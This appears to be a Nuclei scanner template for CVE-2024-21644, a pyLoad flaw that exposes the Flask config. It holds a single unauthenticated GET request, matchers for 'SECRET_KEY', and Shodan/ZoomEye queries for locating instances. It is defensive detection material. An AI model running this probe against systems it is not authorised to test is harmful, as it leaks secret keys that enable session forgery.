49 lines
1.6 KiB
YAML
49 lines
1.6 KiB
YAML
id: CVE-2024-21644
|
|
|
|
info:
|
|
name: pyLoad Flask Config - Access Control
|
|
author: West-wise
|
|
severity: high
|
|
description: |
|
|
pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
|
|
reference:
|
|
- https://github.com/advisories/GHSA-mqpq-2p68-46fv
|
|
- https://github.com/fkie-cad/nvd-json-data-feeds
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-21644
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2024-21644
|
|
cwe-id: CWE-284
|
|
epss-score: 0.41231
|
|
epss-percentile: 0.97205
|
|
cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: pyload
|
|
product: pyload
|
|
shodan-query: html:"pyload"
|
|
zoomeye-query: app:"pyLoad"
|
|
tags: cve,cve2024,python,pip,pyload,access-control
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/render/info.html"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "'SECRET_KEY':"
|
|
- "'pyload_session'"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502202f82c5b1b12cb269f3d3a47d9d26f6ce6eafa0f1eb25f16d53157877adacb2b2022100ba370c0614bdc4291dec0f4e73062b185e7f1b00aea72968559b75e39a239259:922c64590222798bb761d5b6d8e72950 |